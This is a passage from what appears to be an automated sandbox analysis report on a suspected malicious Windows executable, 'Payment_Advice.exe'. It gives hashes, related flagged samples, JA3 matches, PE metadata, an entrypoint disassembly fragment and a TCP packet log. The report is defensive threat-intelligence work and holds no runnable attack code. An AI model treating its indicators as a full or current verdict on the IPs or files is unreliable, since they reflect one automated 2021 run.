                                                                    SecuriteInfo.com.Scr.Malcodegdn33.27584.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    DHL BL2021764774AWB.docGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    Transferencia de borrador.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    FACTURA.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    SecuriteInfo.com.Scr.Malcodegdn30.24885.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195
                                                                    FACTURA.exeGet hashmaliciousBrowse
                                                                    • 195.22.8.69
                                                                    LKrBXO8nk8.exeGet hashmaliciousBrowse
                                                                    • 188.93.227.195

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                    37f463bf4616ecd445d4a1937da06e19cxBR3cCGTw.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    k5THcVgINl.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    b2i2IopgOC.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    G2BPn4a7o1.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    Dokument VAT I - 85926 09 2021 MAG-8.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    qOsCIQD1uR.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    NC7bm1PoKj.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    p0FDRanFUE.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    Tt5xbxWwsb.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    rJPkGz9DpL.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    GVXEsDOGHX.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    IAWCl9VgWq.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    BRl35oWria.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    UcmKadhoIn.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    oGLE7fjvYA.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    ZbhUS5doEw.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    dEYSAsBcE8.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    PO-IMAGE-SCAN-00HD878HE485HDYTE.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    axCZVtYfcO.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238
                                                                    beacon.exeGet hashmaliciousBrowse
                                                                    • 172.217.18.97
                                                                    • 142.250.185.238

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    \Device\ConDrv
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):30
                                                                    Entropy (8bit):3.964735178725505
                                                                    Encrypted:false
                                                                    SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                    MD5:9F754B47B351EF0FC32527B541420595
                                                                    SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                    SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                    SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: NordVPN directory not found!..

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):5.758289537816364
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Payment_Advice.exe
                                                                    File size:90112
                                                                    MD5:3a27f66a430a3b54d24fb8f75e837175
                                                                    SHA1:4af41cd66669d3c2307c1b5af5c198778d174826
                                                                    SHA256:dd996392170826c47b9ab378464423e470a1bdfdff7bcd183c61e3e7896d4326
                                                                    SHA512:2be02118a3affd640c2b1489816cd396ad3d1af6ab229a3a86bcc20f695445777c1146ffc7488b5bc664d16a6283a3bfa3256758804c2d0851a2bd261c1e1034
                                                                    SSDEEP:768:tCbCZDdDSaAhQ41sPuTPfBcrGemB0KxtNavGJluWmqzYlf5sh/YDtOika:twCDDt41hO9mBHp88CmQua
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L...0..V.................0... ...............@....@........

                                                                    File Icon

                                                                    Icon Hash:821ca88c8e8c8c00

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4012c8
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x5692D030 [Sun Jan 10 21:42:08 2016 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:e73b8c032c82c64991ebe487a7ffcd43

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push 0040FDF4h
                                                                    call 00007FDDE8A11513h
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    xor byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    inc eax
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [esi+07B9DDCAh], ch
                                                                    xchg eax, esp
                                                                    int 47h
                                                                    xchg eax, edx
                                                                    pushfd
                                                                    pop eax
                                                                    movsx ecx, byte ptr [ebx-32h]
                                                                    and al, 00h
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [ecx], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add al, bh
                                                                    das
                                                                    sbb al, 03h
                                                                    push esp
                                                                    imul esi, dword ptr [ebx+74h], 6Fh
                                                                    insd
                                                                    jc 00007FDDE8A11583h
                                                                    popad
                                                                    jc 00007FDDE8A11524h
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    dec esp
                                                                    xor dword ptr [eax], eax
                                                                    cmp byte ptr [edi-7ED8AE9Ah], al
                                                                    dec dword ptr [esi]
                                                                    dec esp
                                                                    mov dword ptr [A07C7AE1h], eax
                                                                    xchg eax, esi
                                                                    xor al, 99h
                                                                    inc edx
                                                                    dec ebp
                                                                    jp 00007FDDE8A1158Eh
                                                                    bound esi, dword ptr [ecx+608545E1h]
                                                                    xchg byte ptr [ebx], dl
                                                                    and al, ABh
                                                                    xchg eax, edi
                                                                    jmp far 6699h : 33AD4F3Ah
                                                                    iretd
                                                                    adc dword ptr [edi+00AA000Ch], esi
                                                                    pushad
                                                                    rcl dword ptr [ebx+00000000h], cl
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    sub al, 00000000h
                                                                    add byte ptr [eax+00000001h], bl
                                                                    or dword ptr [eax], eax
                                                                    push ebx
                                                                    jo 00007FDDE8A11591h
                                                                    outsd
                                                                    outsb
                                                                    jns 00007FDDE8A1158Bh
                                                                    jnc 00007FDDE8A1158Fh
                                                                    add byte ptr [46000B01h], cl
                                                                    jc 00007FDDE8A11587h
                                                                    jnc 00007FDDE8A1158Dh

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x135140x28.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x550.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000xe8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x1297c0x13000False0.520379317434data6.25517473092IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .data0x140000xcf40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x150000x5500x1000False0.131591796875data1.42355103484IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x154280x128GLS_BINARY_LSB_FIRST
                                                                    RT_GROUP_ICON0x154140x14data
                                                                    RT_VERSION0x150f00x324dataChineseTaiwan

                                                                    Imports

                                                                    DLLImport
                                                                    MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaStrToAnsi, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0404 0x04b0
                                                                    LegalCopyrightChatSwipe
                                                                    InternalNameAFFEJENDES
                                                                    FileVersion4.04.0001
                                                                    CompanyNameChatSwipe
                                                                    LegalTrademarksChatSwipe
                                                                    CommentsChatSwipe
                                                                    ProductNameChatSwipe
                                                                    ProductVersion4.04.0001
                                                                    FileDescriptionChatSwipe
                                                                    OriginalFilenameAFFEJENDES.exe

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    ChineseTaiwan

                                                                    Network Behavior

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 27, 2021 14:27:46.647640944 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:46.647712946 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:46.647860050 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:46.663566113 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:46.663614035 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:46.717464924 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:46.717726946 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:46.719696045 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:46.719927073 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:46.851212025 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:46.851265907 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:46.851942062 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:46.852076054 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:46.854641914 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:46.897972107 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:47.659102917 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:47.659301043 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:47.659379959 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:47.659457922 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:47.659570932 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:47.659710884 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:47.659746885 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:47.659770966 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:47.659852982 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:47.706471920 CEST49793443192.168.11.20142.250.185.238
                                                                    Sep 27, 2021 14:27:47.706528902 CEST44349793142.250.185.238192.168.11.20
                                                                    Sep 27, 2021 14:27:47.777152061 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.777210951 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:47.777354002 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.777734995 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.777745008 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:47.811906099 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:47.812048912 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.812053919 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.812567949 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:47.812803984 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.816108942 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.816240072 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:47.816598892 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.816937923 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:47.857918024 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.046813965 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.047051907 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.047122002 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.047172070 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.047374010 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.047682047 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.047888994 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.047940016 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.048894882 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.049242973 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.049357891 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.049398899 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.049441099 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.049494982 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.049602985 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.049633980 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.049655914 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.049885988 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.056833029 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.056989908 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.057033062 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.057194948 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.057209015 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.057236910 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.057358027 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.057380915 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.057626963 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.057790995 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.057827950 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.057976007 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.058298111 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.058456898 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.058492899 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.058629990 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.058979034 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.059433937 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.059463978 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.059612989 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.059639931 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.059657097 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.059856892 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.060373068 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.060550928 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.060590982 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.060760975 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.060980082 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.061153889 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.061178923 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.061202049 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.061331034 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.061371088 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.061913013 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.062073946 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.062300920 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.062453985 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.062496901 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.062526941 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.062601089 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.062688112 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.063178062 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.063343048 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.063393116 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.063422918 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.063494921 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.063606024 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.063623905 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.063826084 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.063982964 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.064121962 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.064686060 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.064733982 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.064896107 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.064961910 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.065110922 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.065136909 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.065399885 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.065459967 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.065653086 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.066924095 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.067087889 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.067125082 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.067245960 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.067270994 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.067292929 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.067378044 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.067395926 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.067410946 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.067653894 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.067698956 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.067890882 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.068119049 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.068280935 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.068382025 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.068418026 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.068425894 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.068631887 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.068872929 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.069044113 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.069453001 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.069494963 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.069503069 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.069637060 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.069658041 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.069674969 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.069814920 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.069823027 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.069833040 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.069884062 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.070000887 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.070024014 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.070518970 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.070678949 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.070704937 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.070733070 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.070835114 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.070863962 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.071057081 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.071103096 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.071250916 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.071362972 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.071510077 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.071532965 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.071551085 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.071691990 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.071717978 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.071736097 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.072010994 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.072426081 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.072594881 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.072630882 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.072649956 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.072844982 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.072877884 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.073084116 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.073311090 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.073465109 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.073501110 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.073535919 CEST44349794172.217.18.97192.168.11.20
                                                                    Sep 27, 2021 14:27:48.073616982 CEST49794443192.168.11.20172.217.18.97
                                                                    Sep 27, 2021 14:27:48.073689938 CEST49794443192.168.11.20172.217.18.97
